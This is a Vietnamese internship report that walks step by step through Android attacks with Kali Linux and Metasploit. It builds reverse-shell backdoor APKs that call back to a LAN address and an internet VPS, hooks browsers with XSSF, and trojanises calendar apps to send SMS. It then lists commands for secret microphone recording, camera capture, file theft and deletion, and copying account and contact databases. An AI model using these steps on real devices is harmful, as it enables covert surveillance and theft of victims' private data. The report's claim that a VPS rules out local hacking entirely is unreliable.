1. Báo cáo đề tài thực tập
1
NHẬN XÉT
(Của giáo viên hướng dẫn)
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
...........................................................................................................................................
.......................... , ngày …… tháng …… năm ..........
Giáo viên hướng dẫn
2. Báo cáo đề tài thực tập
2
LỜI CẢM ƠN
Trước tiên , em xin cảm ơn đến các thầy cô trong trường Đại học Khoa Học Tự Nhiên –
TP Hồ Chí Minh và khoa Điện Tử Viễn Thông đã giảng dạy và truyền đạt cho em những kiến
thức nền tảng , cần thiết trong suốt quá trình học tập vừa qua .
Em cũng xin cảm ơn và biết ơn sâu sắc đến thầy Võ Đỗ Thắng , các thầy và anh chị trong
trung tâm đào tạo quản trị và an ninh mạng quốc tế ATHENA đã tạo điều kiện cho em được thực
tập trong mùa hè vừa qua , cũng đã giúp đỡ và hỗ trợ rất nhiều trong quá trình hoàn thành đề tài .
Mặc dù đã nỗ lực hết khả năng của bản thân nhưng với lần đầu tiên trải nghiệm thực tế
với kỳ thực tập nên chắc chắn sẽ có những thiếu sót trong quá trình hoàn thành báo cáo , mong
nhận được sự thông cảm và ý kiến đóng góp tận tình để em có thể bổ sung những thiếu sót của
bản thân .
Một lần nữa em xin chân thành cảm ơn.
Hồ Chí Minh , ngày 10 tháng 11 năm 2014
Sinh Viên thực tập
Nguyễn Quốc Vương
3. Báo cáo đề tài thực tập
3
Ảnh chụp cùng GV. Võ Đỗ Thắng.
Ảnh chụp cùng GV.Trần Lâm Mẫn .
4. Báo cáo đề tài thực tập
4
I/LÀM TRÊN MẠNG LAN (CÓ WIFI)
1/CÁCH CÀI ĐẶT KALI LINUX TRÊN VMWARE
Sơ lược về hệ điều hành Kali Linux:
- Kali Linux là một hệ điều hành được xây dựng trên nhân Linux , được thiết kế để kiểm
tra bảo mật , thử nghiệm xâm nhập các hệ thống máy tính .Tiền thân của Kali Linux là
BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử
dụng. Sau 7 năm liên tục phát triển , tháng 3 năm 2013 , hãng Offensive Security đã công
bố phiên bản mới của BackTrack có thêm gần như tất cả các công cụ thiết yếu mà bất kì
chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp .Nói về ưu điểm của
Kali Linux là nói về nhưng thay đổi giữa BackTrack và Kali . So với BackTrack thì Kali
có rất nhiều cải tiến :
- Kali phát triển trên nền tảng hệ điều hành Debian Giao diện của phần mềm Vmwave
+ Tính tương thích kiến trúc
+ Hỗ trợ mạng không dây tốt hơn
+ Khả năng tùy biến cao
+ Dễ dàng nâng cấp các phiên bản Kali trong tương lai
Cách cài đặt hệ điều hành Kali Linux trên Vmware
- Giao diện của phần mềm VMware
5. Báo cáo đề tài thực tập
5
- Chọn Edit -> Vitual Network Editor…. -> AddNetwork -> OK
- Chọn mục Bridge -> Bridge to . Ở đây chúng ta chọn card mạng thật (wifi hoặc LAN)->
OK.
6. Báo cáo đề tài thực tập
- Về lại giao diện ban đầu của Vmware chọn Create a New Virtual Machine . Trên cửa sổ
6
mới chọn Custom -> Next.
7. Báo cáo đề tài thực tập
7
- Next
- I will install operating system later . - > Next.
8. Báo cáo đề tài thực tập
8
- Chọn Linux .. lựa chọn version (Debian 64-bit)
- ở phần location chúng ta chọn vị trí để lưu . Next
9. Báo cáo đề tài thực tập
9
- Next
- Chọn dung lượng bộ nhớ RAM
10. Báo cáo đề tài thực tập
10
- Use bridged networking-> Next.
- LSI Logic(Recommended)-> Next.
20. Báo cáo đề tài thực tập
20
- Hoàn tất việc cài đặt
21. Báo cáo đề tài thực tập
21
- Đăng nhập với Username là : root và password đã chọn.
22. Báo cáo đề tài thực tập
22
- Giao diện của hệ điều hành Kali Linux đã được khởi động
23. Báo cáo đề tài thực tập
23
2/ NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX
- Đầu tiên
, kiểm tra địa chỉ IP bằng : ifconfig
Địa chỉ IP : 192.168.1.14
- Khởi động terminal và gõ dòng lệnh sau:
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.14 lport=8080 R >
/root/Desktop/test.apk
24. Báo cáo đề tài thực tập
- Máy sẽ tạo 1 file .apk ở bên ngoài desktop , kiểm tra kích thước của file để chắc là file đã
24
tạo thành công
25. Báo cáo đề tài thực tập
25
- Tiếp theo gõ lệnh : msfconsole
26. Báo cáo đề tài thực tập
- Sau khi msfconsole load xong , ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ
26
lệnh sau:
Use exploit/multi/handler
Set payload/meterpreter/reverse_tcp
Set lhost 192.168.1.14 – Địa chỉ IP đã kiểm tra ban đầu
Set lport 8080 – nhập port giống với khi tạo payload ở trên
Exploit
- Sau đó màn hình sẽ hiện ra như bên dưới , lúc này đang chờ 1 máy android mở backdoor.
- Thử giả lập 1 điện thoại và tải file test.apk về và tiến hành cài đặt :
27. Báo cáo đề tài thực tập
- Sau khi cài đặt hoàn tất thì việc kết nối với 1 android đã được thực hiện , lúc này ở console
27
xuất hiện :
28. Báo cáo đề tài thực tập
28
- Ta có thể gõ lệnh help để biết được các lệnh :
29. Báo cáo đề tài thực tập
29
- Có một số lệnh cơ bản như
Để xem thông tin máy : sysinfo
Để sử dụng camera: webcam_list (xem danh sách camera)
Webcam_snap x (sử dụng camera của android)
Để ghi âm : record_mic
Lấy file từ sdcard: cd/sdcard và ls (để xem danh sách thư mục,file)
cd/sdcard/download (để tải về máy )
30. Báo cáo đề tài thực tập
3/TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ
ĐỘC
30
- Đầu tiên , khởi động Kali Linux -> khởi mở Terminal
- Lần lượt thực hiện 3 lệnh để cập nhật Framework
msfupdate
cd /opt/metasploit/apps/pro/msf3
svn export http://xssf.googlecode.com/svn/trunk/ ./ --force
- Thực hiện lệnh “msfconsole” để khởi động Metasploit
31. Báo cáo đề tài thực tập
- Tiếp tục gõ lệnh “load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose” để
31
thực hiện XSSF.
- Thực hiện lệnh “xssf_urls” để nhận được các đường dẫn web như của XSSF Server
, XSSF test page , XSSF logs page …. Sau đó 1 máy nạn nhân bất kì truy cập vào
đường dẫn web XSSF test page :
32. Báo cáo đề tài thực tập
32
- Ta được kết quả như hình . Đồng thời máy tấn công cũng nhận được thông báo :
New victim registered with id : 1
- Để kiểm tra số lượng nạn nhân truy cập vào đường dẫn ta dùng lệnh “xssf_victims”
lúc này sẽ xuất hiện lượng máy nạn nhân truy cập phải
34. Báo cáo đề tài thực tập
- Bây giờ máy tấn công có thể xem thông tin và thực hiện khai thác dữ liệu về nạn
34
nhân bằng cách sử dụng lệnh :
Để kiểm tra thông tin về nạn nhân :
xssf_information <ID máy nạn nhân>
Để kiểm tra các quyền
Search auxiliary/xssf
Gửi thông báo xssf đến máy nạn nhân
Use auxililary/xssf/public/misc/alert
Run
35. Báo cáo đề tài thực tập
4/CÀI ĐẶT TROJAN VÀO MÁY ANDROID QUA ỨNG DỤNG iCALENDAR VÀ
iMATCH
35
Tải về và xem source code của các ứng dụng *.apk:
- Dùng phần mềm Dex2Jar để chuyển đổi file *.dex thành file *.jar
- Tiếp theo xem source code của ứng dụng *.apk bằng phần mềm Jd-gui
- Sau khi tải ứng dụng định dạng *.apk về. Ta giải nén bằng phần mềm WinRAR.
Sau đó copy file classes.dex của ứng dụng vào thư mục chứa phần mềm
Dex2Jar
- Mở command trong Window lên.
Di chuyển đến thư mục phần mềm Dex2Jar bằng lệnh cd
- Chuyển đổi file bằng lệnh “dex2jar <tên file>”
- Dùng Jd-gui mở file classes_dex2jar.jar vừa được tạo để xem source code của
ứng dụng
36. Báo cáo đề tài thực tập
36
- Lưu ý là chúng ta chỉ có thể xem nhưng không chỉnh sửa được.
Cài đặt Trojan ứng dụng iCalendar.apk:
Thực hiện cài đặt Trojan ứng dụng iCalendar vào máy ảo Android 5554, sau
đó tự động gửi tin nhắn đến máy ảo Android 5556. Ứng dụng iMatch cho
phép gửi đi 1 tin nhắn.
- Khởi động 2 máy ảo Android trên Eclipse
- Khởi động phần mềm Super Apktool v2.1. Phần mềm sẽ quét và nhận diện các
máy ảo Android đang chạy.
37. Báo cáo đề tài thực tập
37
Ở ô Device > Ta chọn máy mà ta muốn cài đặt trojan iCalendar.apk
- Project > New Project
- Chọn file iCalendar.apk > Chờ phần mềm giải nén xong
38. Báo cáo đề tài thực tập
- View > View Smali Code: Cho phép chỉnh sửa code của ứng dụng iCalendar.apk
38
39. Báo cáo đề tài thực tập
39
- Chỉnh sửa code của 2 file iCalendar.smali và SmsReceiver.smali
- File iCalendar.smali, sửa code ở line 252 (số điện thoại của máy ta muốn gửi tin
nhắn) và line 253 (là nội dung tin nhắn)
40. Báo cáo đề tài thực tập
- File SmsReceiver.smali, ta sửa code ở line 41 thành số điện thoại mà máy mình
40
muốn gửi đến, giống như ở iCalendar.smali
- Sau khi sửa code, ta phải Save lại 2 file trên.
- Run > Build : cho phép bắt đầu quá trình cài đặt trojan iCalendar.apk vào 1 máy
ảo Android và gửi tin nhắn tự động đến máy ảo Android khác.
41. Báo cáo đề tài thực tập
- Kết quả ta nhận được ở máy Android có số điện thoại 5554 (bị cài đặt trojan
41
iCalendar.apk)
- Giả sử nạn nhân trên click vào xem ứng dụng iCalendar này vài lần. Kết quả nhận
được ở máy Android có số điện thoại 5556 (bị gửi tin nhắn tự động)
42. Báo cáo đề tài thực tập
42
Cài đặt Trojan ứng dụng iMatch:
Thực hiện cài đặt Trojan ứng dụng iMatch vào máy ảo Android 5558, sau đó
tự động gửi tin nhắn đến 2 máy ảo Android 5556 và Android 5554. Ứng dụng
iMatch cho phép gửi cùng lúc 4 tin nhắn.
- Khởi động 3 máy ảo > Tạo project mới > Trỏ đến file iMatch.apk > Đợi ứng
dụng được giải nén > View > View Smali Code (tương tự như thao tác với
iCalendar.apk)
- Sửa code của file MJUtils.smali
43. Báo cáo đề tài thực tập
- Chỉnh sửa số điện thoại ở các line 57, line 66, line 75, line 84; chỉnh sửa nội dung
43
tin nhắn ở các line 58, line 67, line 76, line 85.
44. Báo cáo đề tài thực tập
44
- Run > Build : cho phép bắt đầu quá trình cài đặt trojan iMatch.apk và gửi tin
nhắn tự động.
- Kết quả ta nhận được ở máy Android có số điện thoại 5558 (bị cài đặt trojan
iMatch.apk)
45. Báo cáo đề tài thực tập
- Kết quả nhận được ở máy Android 5556 và Android 5554 (bị gửi tin nhắn tự động)
45
46. Báo cáo đề tài thực tập
II/LÀM TRÊN MÔI TRƯỜNG VPS(SERVER CÓ
INTERNET)
46
1. Giới thiệu máy chủ ảo VPS:
- Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ
vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì
có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số
này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.
- Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn
quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn
chế 100% khả năng bị hack local.
- Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài
nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng
47. Báo cáo đề tài thực tập
đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn
công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.
- VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng,
nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi
người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…
47
2. Đặc điểm của VPS:
- Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung
lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
- Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
- Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng
khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng
trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…
- Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên
mà không cần phải khởi động lại hệ thống.
- Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
3. Giá trị khi sử dụng VPS:
- Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS
phù hợp.
- Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
- Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
- Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.
- Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
48. Báo cáo đề tài thực tập
48
4. Kết nối VPS:
- Đối với máy hệ điều hành Windows, để có thể kết nối với máy chủ ảo VPS, ta cần
sử dụng ứng dụng Remote Desktop Connection.
- Để khởi động ứng dụng RDC này, ta chỉ cần vào Start > All Programs >
Accessories > Remote Desktop Connection
- Sau đó ta cần nhập vào Địa chỉ IP, Username và Password được cung cấp khi ta
đăng ký tài khoản VPS.
- Như vậy là ta đã có thể kết nối với máy chủ ảo VPS.
CÀI ĐẶT METASPLOIT TRÊN VPS
Sau khi đã kết nối được máy VPS bằng quyền Administrator, ta tiến hành tải
và cài đặt phần mềm Metasploit để phục vụ cho việc tấn công điện thoại
Android
1. Giới thiệu về phần mềm Metasploit:
- Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra,
tấn công và khai thác lỗi của các service.
- Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những
components được viết bằng C, Assembler, và Python.
- Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
2. Giới thiệu payload Meterpreter:
- Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong
Metasploit framework.
- Muc đích của Meterpreter là để cung cấp những tập lệnh để khai thác, tấn câng các
máy remote computers. Nó được viết từ các developers dưới dạng shared object(
DLL) files.
49. Báo cáo đề tài thực tập
- Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn
không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống
virus.
- Trong bài viết này, để tấn công vào điện thoại Android thì ta sẽ sử dụng payload
49
Meterpreter này.
3. Cài đặt Metasploit:
Bước 1: Tải Metasploit bản mới nhất từ trang chủ www.metasploit.com hoặc trang
download http://www.rapid7.com/products/metasploit/download.jsp . Ta sử dụng
bản Community.
Bước 2: Tiến hành đăng ký để tải Metasploit
50. Báo cáo đề tài thực tập
Sau khi đăng ký, ta có thể tải về. Và ta nhận được 1 mail có chứa Key để
Active Metasploit sau khi cài đặt. Mail này gửi về địa chỉ Email mà bạn đã đăng
ký.
Bước 3: Cài đặt phần mềm qua file đã tải về
50
- Chọn thư mục cài đặt
- Chọn Port của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790
- Chọn server và ngày hết hạn, để mặc định.
- Nhấp Next và Metasploit sẽ được cài đặt vào thư mục đã chọn
- Nhấp Finish và truy cập đến giao diện web của chương trình
Bước 4: Active phần mềm Metasploit bằng cách truy cập vào link
https://localhost:3790/
Tạo một tài khoản sử dụng:
51. Báo cáo đề tài thực tập
51
Nhập Key đã nhận từ email:
Chọn ACTIVATE LICENSE
Bước 5: Khởi động Metasploit bằng cách vào Start > Progams > Metasploit >
Metasploit Console
TẤN CÔNG MÁY ANDROID TỪ MÁY VPS
1. Tạo ứng dụng chứa mã độc trên Kali Linux:
Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android
52. Báo cáo đề tài thực tập
Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal.
Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter:
“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS>
lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>”
Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162
lport=4444 R> /root/Desktop/hack.apk
52
2. Tấn công điện thoại Android:
Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể
mất vài chục phút.
Bước 2: Tiến hành thiết đặt payload bằng các lệnh
“ use exploit/multi/handler ”
“ set payload android/meterpreter/reverse_tcp ”
“ set lhost 14.0.21.162 ”
“ set lport 4444 ”
“ run ”
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở
trên.
Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy
Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận
được thông báo như sau:
Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
53. Báo cáo đề tài thực tập
53
3. Các phương thức tấn công được sử dụng:
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân.
3.1 Ghi âm lén:
Sử dụng lệnh: “ record_mic <số giây ghi âm> ”
3.2 Sử dụng camera:
Xem danh sách webcam của thiết bị: “ webcam_list ”
Chụp ảnh lén: “webcam_snap <mã camera>”
3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard:
Di chuyển vào thư mục bằng lệnh: cd
Tải về bằng lệnh: download <tên file>
Xóa tập tin bằng lệnh: rm <tên file>
54. Báo cáo đề tài thực tập
54
3.4 Truy cập trực tiếp vào hệ thống:
Truy cập vào hệ thống bằng lệnh: “shell” > “su”
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami”
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể
tiếp tục tấn công.
3.5 Truy cập và khai thác tài khoản người dùng:
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l”
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
55. Báo cáo đề tài thực tập
55
Trở về meterpreter và tải file accounts.db về:
Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
56. Báo cáo đề tài thực tập
56
3.6 Truy cập và đánh cắp danh bạ điện thoại:
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:
“cd /data/data/com.android.providers.contacts/databases”
Copy về thẻ sdcard và tải về máy
57. Báo cáo đề tài thực tập
57
Xem nội dung của contacts2.db bằng SQLite Manager
58. Báo cáo đề tài thực tập
58
3.7 Một số câu lệnh khác:
- Để biết thêm về các lệnh có thể thực hiện ta dùng help
- Để xem thông tin về máy, nhập lệnh sysinfo
- Để xem các tác vụ đang chạy gõ ps
- Xem ip của máy bị hack ta gõ ipconfig
- Xem danh sách thư mục, file gõ ls
- Để upload gõ lệnh upload
- ls -l danh mục file và các quyền
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
59. Báo cáo đề tài thực tập
59
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
- Để xem danh sách và down load các file hay thay đổi các file trong ROM
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
- Ctrl + C để quay lại
60. Báo cáo đề tài thực tập
60
Contents
NHẬN XÉT.................................................................................................................................... 1
LỜI CẢM ƠN ................................................................................................................................ 2
I/LÀM TRÊN MẠNG LAN (CÓ WIFI) ..................................................................................... 4
1/CÁCH CÀI ĐẶT KALI LINUX TRÊN VMWARE............................................................... 4
2/ NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX ........................................ 23
3/TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC ... 30
4/CÀI ĐẶT TROJAN VÀO MÁY ANDROID QUA ỨNG DỤNG iCALENDAR VÀ iMATCH
................................................................................................................................................... 35
II/LÀM TRÊN MÔI TRƯỜNG VPS(SERVER CÓ INTERNET) ........................................ 46
1. Giới thiệu máy chủ ảo VPS: ....................................................................................... 46
2. Đặc điểm của VPS: ..................................................................................................... 47
3. Giá trị khi sử dụng VPS: ............................................................................................. 47
4. Kết nối VPS: ............................................................................................................... 48
CÀI ĐẶT METASPLOIT TRÊN VPS .............................................................................. 48
1. Giới thiệu về phần mềm Metasploit: .......................................................................... 48
2. Giới thiệu payload Meterpreter: ................................................................................. 48
3. Cài đặt Metasploit:...................................................................................................... 49
TẤN CÔNG MÁY ANDROID TỪ MÁY VPS ................................................................ 51
1. Tạo ứng dụng chứa mã độc trên Kali Linux: .............................................................. 51
2. Tấn công điện thoại Android: ..................................................................................... 52
3. Các phương thức tấn công được sử dụng: .................................................................. 53